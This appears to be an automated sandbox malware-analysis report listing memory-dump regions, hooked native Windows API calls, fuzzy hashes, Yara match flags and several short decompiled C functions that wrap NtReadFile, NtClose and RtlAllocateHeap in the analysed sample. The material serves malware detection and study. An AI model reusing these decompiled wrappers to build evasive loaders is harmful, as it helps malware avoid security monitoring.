                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: DuplicateHandle
                    • String ID:
                    • API String ID: 3793708945-0
                    • Opcode ID: 7adc1704f33ad301560675eff0b2a05e157ecbbefd7bde5a61c10d0fe1bab6f8
                    • Instruction ID: b03ed07fefe251853f7a61677e6271822350c8d7a31eb5a1bea54b04c38f8d5b
                    • Opcode Fuzzy Hash: 7adc1704f33ad301560675eff0b2a05e157ecbbefd7bde5a61c10d0fe1bab6f8
                    • Instruction Fuzzy Hash: 3621C2B59012099FDB10CFAAD984ADEBBF8FF48324F14841AE918A7310D374A954CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DA9869,00000800,00000000,00000000), ref: 00DA9A7A
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 52948d9eddb8d36d8ff63436e61393bfeb10c391a12a979304f7d06ea00e6dbc
                    • Instruction ID: 6a1c82e5e547f9a71bc20e1d2533f7c0120d7a8c21c59b25f8af9c8fdab1bb87
                    • Opcode Fuzzy Hash: 52948d9eddb8d36d8ff63436e61393bfeb10c391a12a979304f7d06ea00e6dbc
                    • Instruction Fuzzy Hash: 7A2167B6D002098FDB10CFAAD844ADEFBF5AB89324F14842ED519B7300C374A905CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DA9869,00000800,00000000,00000000), ref: 00DA9A7A
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: c13743f5a9b36943f698dadaa37729ca3f25e596dcd2e19de14461ba034204ae
                    • Instruction ID: f5d372b83a280661625165b6d6eec5cb0f440b0a7f550019a6fb6e858a6879ba
                    • Opcode Fuzzy Hash: c13743f5a9b36943f698dadaa37729ca3f25e596dcd2e19de14461ba034204ae
                    • Instruction Fuzzy Hash: 6C11E4B69003099FDB10CF9AD444BDEFBF8EB89324F14842AE519B7600C375A945CFA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00DA97EE
                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID: HandleModule
                    • String ID:
                    • API String ID: 4139908857-0
                    • Opcode ID: 8bc259c34dca55c9bc6ca57a3346cc3a69a2392b5fbf28d223276dfd8cd6a863
                    • Instruction ID: 8b3710bc7a1b183241f831f3bedfd0fc5f1c2dcc2249921aabf81cdb15f645bd
                    • Opcode Fuzzy Hash: 8bc259c34dca55c9bc6ca57a3346cc3a69a2392b5fbf28d223276dfd8cd6a863
                    • Instruction Fuzzy Hash: 2011E3B5C006498FDB10CF9AD444BDEFBF4AF89324F14842AD519B7600D374A545CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.298536914.0000000000BCD000.00000040.00000001.sdmp, Offset: 00BCD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87731c252d2829a5e97d71ff75086e286231ce1de63de8884cad6527f1d47299
                    • Instruction ID: 6ad47b27cc88d3c3e630fc2a70461d9b0383c3c8dcc347afa68ecb1e55374064
                    • Opcode Fuzzy Hash: 87731c252d2829a5e97d71ff75086e286231ce1de63de8884cad6527f1d47299
                    • Instruction Fuzzy Hash: 8521D079604244DFCB14CF28D9D4F16BBA5FB84324F24C9FDD84A4B286C736D846CA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.298536914.0000000000BCD000.00000040.00000001.sdmp, Offset: 00BCD000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42d64357f0f686ce32959293dc5a283a125116ca254391b5083474e153051df9
                    • Instruction ID: 315f4cfb17f4ee818e92f71f1047b54eaf7a0abaa3efc6ccb0b9904decdd0e92
                    • Opcode Fuzzy Hash: 42d64357f0f686ce32959293dc5a283a125116ca254391b5083474e153051df9
                    • Instruction Fuzzy Hash: 6E2199755093809FCB12CF24D594B15BF71EB45314F28C5EED8498B657C33AD84ACB62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 29c262064cad6825872a1257ac44178a81554bf983baa93aaba1a3b254a32542
                    • Instruction ID: 6704048ea0bacef2a04a68304430806782c9b5d456c4d9e7ed7b6c7a2797cbf2
                    • Opcode Fuzzy Hash: 29c262064cad6825872a1257ac44178a81554bf983baa93aaba1a3b254a32542
                    • Instruction Fuzzy Hash: 2F12D5F1C917468BE312DF65E8981CD7BA1B746328FD06A09D2633AAD0D7B411EACF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ddabeb8829885d875c608f2ae301cb282992f522c3c9570e8987c0b42f9c8322
                    • Instruction ID: da71df2d3607dd150ca72eb1c7b5b32a8b6bcea6a72c6a5c269b03faa7bbe5a8
                    • Opcode Fuzzy Hash: ddabeb8829885d875c608f2ae301cb282992f522c3c9570e8987c0b42f9c8322
                    • Instruction Fuzzy Hash: 1DA14C32E006198FCF05DFB5C8445DEBBB3FF85300B15856AE906AB261EB71E955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.298620192.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77d93d4cfc93dc83c3f796da8b08dcdb9274bdfe73c16b909975ba6c21e0928d
                    • Instruction ID: 671ce468f07875f831138b7beba15bdf2475423db0f1e5f52810b28047bcf147
                    • Opcode Fuzzy Hash: 77d93d4cfc93dc83c3f796da8b08dcdb9274bdfe73c16b909975ba6c21e0928d
                    • Instruction Fuzzy Hash: 50C16CB0C917468BD312EF65E8981CD7B71BB86328F916A09D2223B6D0D7B414EACF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: 8eeb3b91b95342c17108ad0ffa92a1bfd8d5998487622c32ba417a737261854e
                    • Instruction ID: 6f3c4289bd5354d0cac49cdb546d690e9120c8d6dacb0d28e3d6b7d687130ae2
                    • Opcode Fuzzy Hash: 8eeb3b91b95342c17108ad0ffa92a1bfd8d5998487622c32ba417a737261854e
                    • Instruction Fuzzy Hash: A911E2B6204148AFCB04DF99DC80DEB77A9EF8C758F15824DFA1D97245C634E8128BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0041A410(void* __edx, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                    				void* __esi;
                    				void* _t18;
                    				void* _t28;
                    				intOrPtr* _t29;
                    
                    				_t13 = _a4;
                    				_t29 = _a4 + 0xc48;
                    				E0041AF60(__edx, _t28, _t29, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                    				_t4 =  &_a40; // 0x414a31
                    				_t6 =  &_a32; // 0x414d72
                    				_t12 =  &_a8; // 0x414d72
                    				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                    				return _t18;
                    			}
                    Instruction addresses: 0x0041a413, 0x0041a41f, 0x0041a427, 0x0041a42c, 0x0041a432, 0x0041a44d, 0x0041a455, 0x0041a459

                    APIs
                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: 1JA$rMA$rMA
                    • API String ID: 2738559852-782607585
                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A48A(void* __eax) {
                    				void* __esi;
                    				long _t9;
                    				void* _t11;
                    				void* _t13;
                    
                    				_t6 =  *0xFFFFFFFF8BEC8B5D;
                    				_t2 = _t6 + 0x10; // 0x300
                    				_t3 = _t6 + 0xc50; // 0x40a943
                    				E0041AF60(_t11, _t13, _t3,  *0xFFFFFFFF8BEC8B5D, _t3,  *_t2, 0, 0x2c);
                    				_t9 = NtClose( *0xFFFFFFFF8BEC8B61); // executed
                    				return _t9;
                    			}
                    Instruction addresses: 0x0041a493, 0x0041a496, 0x0041a49f, 0x0041a4a7, 0x0041a4b5, 0x0041a4b9

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID: |j]
                    • API String ID: 3535843008-2280844170
                    • Opcode ID: f3bea203bdf89a582c5e28b2328a93e87e997c41c1792388143d87f01e16f298
                    • Instruction ID: 2bd7d605dc9b6bf0b5616078ad4ce38f7b33599b8aef5089775911611445b326
                    • Opcode Fuzzy Hash: f3bea203bdf89a582c5e28b2328a93e87e997c41c1792388143d87f01e16f298
                    • Instruction Fuzzy Hash: D5D02BA94092C04BC710EAF464C10C67B40DD406187244DCEE8D847207D128D6165392
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: f7d17fcdca2f04d08c26e25dccd3b025c16ba96a20ecda3e57daa5e63cba7025
                    • Instruction ID: 8be2e99e4947dc9901a49d9add03c403e68e32f92b34c06053dc6282d84bcd9b
                    • Opcode Fuzzy Hash: f7d17fcdca2f04d08c26e25dccd3b025c16ba96a20ecda3e57daa5e63cba7025
                    • Instruction Fuzzy Hash: 301115B2200208AFCB08DF89DC85DEB73ADEF8C718F148109FA0C97241D630E861CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 742927f3cf83c7465963415d3806a27fb7534f1a772e45855accd144e44c38b9
                    • Instruction ID: d35eaa645325c8222a5989e14eced1605b5582302af0532cf70d6e4d65d3aa2d
                    • Opcode Fuzzy Hash: 742927f3cf83c7465963415d3806a27fb7534f1a772e45855accd144e44c38b9
                    • Instruction Fuzzy Hash: A8F01CB2210208ABDB14DF89DC91EEB77ADEF8C754F158549FE5C9B241C630E911CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: a105522f18737afdd3de150e3a65e265dba9934b6f966ef2572593ff53880916
                    • Instruction ID: ee87163a0334f3c546b455c64c2f21f3d4efc380bd1346534c52300d69388dee
                    • Opcode Fuzzy Hash: a105522f18737afdd3de150e3a65e265dba9934b6f966ef2572593ff53880916
                    • Instruction Fuzzy Hash: A29002B120101902D140719984047460105A7D0351F71C011E9454654EC6998DD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f910d644da5ec42aca0aadd80be6dd298713355a20d0c6d2e656b29504d1eda8
                    • Instruction ID: cf0dfdd77a9f80e5a127ab4b75994b40626b55ce941f4c49c3a00bece6b772ff
                    • Opcode Fuzzy Hash: f910d644da5ec42aca0aadd80be6dd298713355a20d0c6d2e656b29504d1eda8
                    • Instruction Fuzzy Hash: 509002A134101942D10061998414B060105E7E1351F71C015E5454654DC659CC527266
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0855f305879db5a541256842661c0da005b90c922cea96d1b51ab8db81c2ab59
                    • Instruction ID: 3d73e3a956adec25d819fe75e08a662c771846cae75ae5da6d3d47c444016827
                    • Opcode Fuzzy Hash: 0855f305879db5a541256842661c0da005b90c922cea96d1b51ab8db81c2ab59
                    • Instruction Fuzzy Hash: 2F900261242056525545B19984045074106B7E02917B1C012E5804A50CC5669C56E761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 50a4e6b10ea48c7505b4e89ccca1451a28655255e8e5deb66b43361660fe6247
                    • Instruction ID: d72167b2fb4c08078c3e18ec33a7c3b2bdd7b122f4153990f12f4adabe24d19e
                    • Opcode Fuzzy Hash: 50a4e6b10ea48c7505b4e89ccca1451a28655255e8e5deb66b43361660fe6247
                    • Instruction Fuzzy Hash: D590027120101913D111619985047070109A7D0291FB1C412E4814658DD6968D52B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 1c976ec2bd9a81aa7d2e642915ebaade194c872b549d677724c41779838e0c85
                    • Instruction ID: 3fc063ccc4fccc9eb0d273b34b49b5c2b77136868a602acbfbb9b21fd57f5580
                    • Opcode Fuzzy Hash: 1c976ec2bd9a81aa7d2e642915ebaade194c872b549d677724c41779838e0c85
                    • Instruction Fuzzy Hash: 3890026160101A02D10171998404616010AA7D0291FB1C022E5414655ECA658D92B271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d08aaea2fd19777ba3112cf471e0e4f54674075aab75045b87a0e01d596925d6
                    • Instruction ID: 4fc258700ffd22729ce832d766cdb35ccb3138bfaed5742b3beb8ea794fcdf8d
                    • Opcode Fuzzy Hash: d08aaea2fd19777ba3112cf471e0e4f54674075aab75045b87a0e01d596925d6
                    • Instruction Fuzzy Hash: D690027120141902D1006199881470B0105A7D0352F71C011E5554655DC6658C5176B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 570366d9583cecb7e57cab5415db1e124cc9583e81ad516a8a8973317da3a69b
                    • Instruction ID: 3e9b5b4444e5ec5f56f9257722eb1b86e47f349822cb088feaa08d65dbb3be1d
                    • Opcode Fuzzy Hash: 570366d9583cecb7e57cab5415db1e124cc9583e81ad516a8a8973317da3a69b
                    • Instruction Fuzzy Hash: AD90026160101542414071A9C8449064105BBE1261771C121E4D88650DC5998C6567A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7fefe75259d291b9040d6fe9dad83f60969f5d7727ea0b654ad5ba10b28068c0
                    • Instruction ID: f2bfdab2a1320ddc21340d1c77d0da6a703716f45a7b8f29dc116974c2f552e7
                    • Opcode Fuzzy Hash: 7fefe75259d291b9040d6fe9dad83f60969f5d7727ea0b654ad5ba10b28068c0
                    • Instruction Fuzzy Hash: 8690026121181542D20065A98C14B070105A7D0353F71C115E4544654CC9558C616661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5280c61a771a2ea5a33117cfe6d528f78d81af52fa7ccfff62da5122115ace68
                    • Instruction ID: 5880a5b05980975c32980b7594c9a934872821905d37d21177977a306f8cfc03
                    • Opcode Fuzzy Hash: 5280c61a771a2ea5a33117cfe6d528f78d81af52fa7ccfff62da5122115ace68
                    • Instruction Fuzzy Hash: 22900265211015030105A59947045070146A7D53A1371C021F5405650CD6618C616261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: eb6640105ffc40f6a61ea37ff18a910fd43b2f6940f50864205ba2b084005e7a
                    • Instruction ID: 8028669808f33129442a4a681fe17abe62991cc45ef3a9bd171b4cfdc9d4ccf5
                    • Opcode Fuzzy Hash: eb6640105ffc40f6a61ea37ff18a910fd43b2f6940f50864205ba2b084005e7a
                    • Instruction Fuzzy Hash: 199002A120201503410571998414616410AA7E0251B71C021E5404690DC5658C917265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: fc24e1f5aa55b5e528b0b4b94d87b4da1ed772ae5031354a3b33767ebc8ee761
                    • Instruction ID: 191c28b2c8d0c25894f977ef2bfd42aef6c60ea605aebd25c68e7b39a679da1c
                    • Opcode Fuzzy Hash: fc24e1f5aa55b5e528b0b4b94d87b4da1ed772ae5031354a3b33767ebc8ee761
                    • Instruction Fuzzy Hash: 2490027120101902D10065D994086460105A7E0351F71D011E9414655EC6A58C917271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2edef82a11fc7acfcee5d06dae51ea98ba3588a169e856350dac1d91fbfb53fc
                    • Instruction ID: 86dacf91780967434c7dadac024d7c2e2f0e9cc6e368ec83198f11eabf6b31bd
                    • Opcode Fuzzy Hash: 2edef82a11fc7acfcee5d06dae51ea98ba3588a169e856350dac1d91fbfb53fc
                    • Instruction Fuzzy Hash: B790026921301502D1807199940860A0105A7D1252FB1D415E4405658CC9558C696361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 15b52f49ae51c358c7dbe84c3ab9af2dd10e2dd4b5a196d1e384e2068ea8e909
                    • Instruction ID: 604dbe2ca27786819bf8dfd39d0b48cd28b001b06d2eceb7e274c29a9cd51e0c
                    • Opcode Fuzzy Hash: 15b52f49ae51c358c7dbe84c3ab9af2dd10e2dd4b5a196d1e384e2068ea8e909
                    • Instruction Fuzzy Hash: 5D90026130101503D140719994186064105F7E1351F71D011E4804654CD9558C566362
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 49703f1d740e58d26d483b93ac045bd106730e2a9e9d765270a4a6ae2030fad6
                    • Instruction ID: 7057c20464e9235834c55bfe2684fa8c3fe2d940465292cf1e208e258bc0f00b
                    • Opcode Fuzzy Hash: 49703f1d740e58d26d483b93ac045bd106730e2a9e9d765270a4a6ae2030fad6
                    • Instruction Fuzzy Hash: 6290027120101D02D1807199840464A0105A7D1351FB1C015E4415754DCA558E5977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, Offset: 00FB0000, based on PE: true
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: e9821b2f4787b6e2718a375ec9abe0015996017dc15cb976015a4db794b98e9d
                    • Instruction ID: bdc534fafd76f78e0bb0b21699fe6831900557b81843410f2c1f1ef1f8578717
                    • Opcode Fuzzy Hash: e9821b2f4787b6e2718a375ec9abe0015996017dc15cb976015a4db794b98e9d
                    • Instruction Fuzzy Hash: 2090027120109D02D1106199C40474A0105A7D0351F75C411E8814758DC6D58C917261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0041A630(void* __edx, intOrPtr _a4, char _a8, long _a12, long _a16) {
                    				void* __esi;
                    				void* _t10;
                    				void* _t16;
                    
                    				_t7 = _a4;
                    				E0041AF60(__edx, _t16, _a4 + 0xc70, _t7, _a4 + 0xc70,  *((intOrPtr*)(_t7 + 0x10)), 0, 0x34);
                    				_t6 =  &_a8; // 0x414536
                    				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                    				return _t10;
                    			}

                    Instruction addresses: 0x0041a633, 0x0041a647, 0x0041a652, 0x0041a65d, 0x0041a661

                    APIs
                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                    Strings
                    Memory Dump Source
                    • Source File: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6EA
                    • API String ID: 1279760036-1400015478
